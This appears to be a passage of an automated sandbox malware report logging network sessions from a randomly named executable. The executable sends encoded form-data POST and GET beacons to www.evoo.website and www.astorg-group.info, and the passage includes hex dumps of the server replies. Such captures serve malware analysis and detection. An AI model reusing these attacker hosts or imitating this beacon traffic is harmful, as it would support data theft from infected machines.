                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.849731128.65.195.180805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:07.805094004 CET1670OUTPOST /293d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        Origin: http://www.evoo.website
                                                                                        Referer: http://www.evoo.website/293d/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 57 42 33 4e 4a 6f 6c 6a 6c 4e 44 41 59 78 71 37 6e 53 7a 63 34 73 59 42 65 70 50 38 4a 76 4c 78 44 34 56 48 33 30 64 38 57 78 4f 71 59 31 6a 62 44 73 55 78 71 59 62 4a 6b 42 53 69 38 44 44 5a 79 4a 6c 33 78 71 67 41 75 50 34 31 54 46 70 73 49 59 6c 69 49 79 30 46 6f 75 37 73 51 62 45 7a 73 44 34 50 46 4d 72 42 42 41 5a 51 61 42 6d 4d 4f 39 4f 54 4e 39 75 76 67 6d 55 54 58 48 30 4a 71 52 66 35 63 36 47 6a 42 67 48 58 36 36 6f 6c 33 69 67 51 46 51 61 6e 68 6e 72 33 54 56 42 49 41 71 6e 2b 2b 61 7a 4f 35 69 51 72 52 65 47 51 7a 4e 32 30 59 77 67 53 42 5a 2f 4e 71 2f 35 69 66 4e 49 46 43 6a 42 4b 6d 53 6c 44 78 72 50 4b 6b 79 76 4a 4c 43 4b 36 32 63 62 4d 48 73 6e 37 54 6f 32 6e 54 50 73 77 4e 70 43 4f 79 7a 36 6e 45 79 36 63 4f 6f 66 74 69 51 58 33 50 58 41 57 6c 50 72 6c 51 57 52 38 75 5a 79 6e 42 62 2b 58 50 73 7a 50 70 31 4e 4c 4c 6e 54 37 6b 77 43 78 6e 4d 37 [TRUNCATED]
                                                                                        Data Ascii: A60d=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JqRf5c6GjBgHX66ol3igQFQanhnr3TVBIAqn++azO5iQrReGQzN20YwgSBZ/Nq/5ifNIFCjBKmSlDxrPKkyvJLCK62cbMHsn7To2nTPswNpCOyz6nEy6cOoftiQX3PXAWlPrlQWR8uZynBb+XPszPp1NLLnT7kwCxnM7RC4Ng/pF9q70W4c1bxTRIAYO90zyx3DSDy9vzAPi4MkTmoTdSPL8DtkXpQ0iwf+goSXIn4z5/RkrPuV9Lo/3EmBNz270y+7uXNX5lMni3Bi9gFnOEC3cfvPDXpJXjlCpBlE8VATrMJ8S16dB3ctncfCnY0OWmSgKglwiLWG25i5fixef/PqLIF17DM2/uFRU6VERiemAWrtwJYc6RWx+mYySHJ7BP3dWlr4cwqllZzhMjpHgv8NYqlNC5OQqLOb7D2N5Fos10k36jxs7EUlpBFj8DSTjMI792lTXgy9yC2V2TQ5f8KhcCoAhv/VvSEKC16gfPxvJ3McJnMpUwLA5NFzkHXK4a5bPFeEFaJx4uDutHkrtswQ56B5iOcrsetD2YSkqt/loIxwJye9PNVxShIDYDL1MFBGDsb5zeEv+vna32iPc3V4R6nR5Bw8xDcbYVpyxKj0OuCFAWh75POM3uRqoXwraW0yfr7oPloALQypBWPJYN07OkIh+7yvRyWgqJTVRNkfx5Jo2byX0EYr1dpO36lW5K+uwRSvrH8LYtwn64IvYgBSwtDE0VHP2BihECgrvR7LfbOWosET8e82ztXRA0mChmwdwzGJNZ8pJScV/FddHGGsJUDHL0EO0PK7HJ9O2XHubSt5XCranvsOrvWPiqSJ2vWfZOP [TRUNCATED]
                                                                                        Nov 6, 2024 16:01:08.612478971 CET458INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:08 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.849732128.65.195.180805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:10.354365110 CET378OUTGET /293d/?QftlZ=CnaPg8j&A60d=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRb4J0orjC0OEaNIQeyVbD4LqlGxYuRKPk3SC/Id1jS91tA== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.evoo.website
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:01:11.182080984 CET458INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:01:11 GMT
                                                                                        Server: Apache/2.4.25 (Debian)
                                                                                        Content-Length: 278
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.849733217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:16.387243032 CET648OUTPOST /vdvc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        Origin: http://www.astorg-group.info
                                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 47 4c 6b 68 7a 6b 55 66 54 51 53 66 71 44 4a 2b 41 6b 38 67 79 4e 31 79 5a 45 72 30 71 47 73 49 4e 66 66 2f 6a 63 3d
                                                                                        Data Ascii: A60d=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuGLkhzkUfTQSfqDJ+Ak8gyN1yZEr0qGsINff/jc=
                                                                                        Nov 6, 2024 16:01:17.197098017 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:17 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.849734217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:18.954898119 CET668OUTPOST /vdvc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        Origin: http://www.astorg-group.info
                                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 6c 65 79 61 73 64 78 64 62 45 53 75 50 76 68 30 4c 73 45 44 55 6f 59 75 76 39 74 51 78 36 65 30 6b 4b 6e 32 64 64
                                                                                        Data Ascii: A60d=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jyleyasdxdbESuPvh0LsEDUoYuv9tQx6e0kKn2dd
                                                                                        Nov 6, 2024 16:01:19.766999960 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:19 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.849735217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:21.504544020 CET1685OUTPOST /vdvc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        Origin: http://www.astorg-group.info
                                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 55 73 59 71 7a 6b 2f 68 77 43 67 41 42 66 32 63 55 56 31 63 76 36 58 6f 7a 39 6d 6a 33 39 47 30 67 59 64 74 66 68 2f 41 6f 4e 4d 56 38 2b 70 6a 74 51 37 45 2b 78 51 48 42 74 43 78 67 31 47 36 52 48 64 63 34 34 48 32 34 6c 31 57 46 44 47 49 6f 4b 68 57 59 38 74 63 66 53 33 35 4e 32 4b 55 66 74 6c 33 64 6a 2f 34 63 41 50 7a 75 30 37 38 6d 34 39 63 6e 6a 72 69 4b 77 43 77 75 7a 4f 77 2b 61 36 32 6a 51 34 39 42 48 59 70 48 58 59 32 49 4a 74 61 6b 50 59 74 5a 52 47 54 2b 2b 6f 48 41 6c 32 [TRUNCATED]
                                                                                        Data Ascii: A60d=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZLTzMS0FxaxKQXpL9MiDTKR0wYW8baoTcf6l9+klycSLffdSTJFkDdcJb01cYAq7DJ9LEPOOygx6CrLiredU/O0vQExynh08GAXCC4GTp256/EORkAZq4QGjjVftpVl3B1UsYqzk/hwCgABf2cUV1cv6Xoz9mj39G0gYdtfh/AoNMV8+pjtQ7E+xQHBtCxg1G6RHdc44H24l1WFDGIoKhWY8tcfS35N2KUftl3dj/4cAPzu078m49cnjriKwCwuzOw+a62jQ49BHYpHXY2IJtakPYtZRGT++oHAl26GCKcyHlqO8OiP1gu2pr9NbmoK/8g9JSZQek419ZFgCvzmcrTpZyM/ZOmh9rrJyW0ZrexUb2mb16Xj7rIES9B2V9qPd8xwplqZXqDVZeylr3OH6+AJhBR+ZiluprsYtX4+1NkS9oHsJ1ZQHa6aYsJIirOX6CYT7QcOsKlNWzX5rIUh5FiZ3Ug2ER8yyBq4jvsYtjdd+73su7JtCq/KRHO3kPCSMGpQ6cT4NsWHVE9fdvozFxH234GClP9dEM+QE6cSsS3mV07/6oagOdFn7HLaUCUGNqkyepMzW2yr94j/k7m2rpWhcsb+tKFvL2Td16k59OJO0vXRWys669dM5TcjilzoYwhN1wTuGkpIuARvWB7EVtPt/o3/M5u/u2lNiv4peHz5104p2aPV4ICXRHvIPn1uOEkJ9ujSRem7lP4KuvPHsRe23edpHUTA+LsSeGOnM7CPawXxwrQy4SRLH7wJp1wFx/b81pimRnKSpGw14ctutko1wqXoB6HjaogyXnwPG0uWKAaIzqsEzoRK+i2I9simoWl76OyxZkTMGr43FoWh5Qwb5l0xptDk/Ea6ccsMSEBhcqwhr+T9LQ9B4/cB5/sur4B9pAHQFzayf22RSD2ie41rXdxk6DOJB78juFnPWY28Tr04TS45CuBAsgJx+w+GpXQmpHrM [TRUNCATED]
                                                                                        Nov 6, 2024 16:01:22.318883896 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:22 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.849736217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:24.048579931 CET383OUTGET /vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:01:24.861299992 CET1236INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:24 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Language
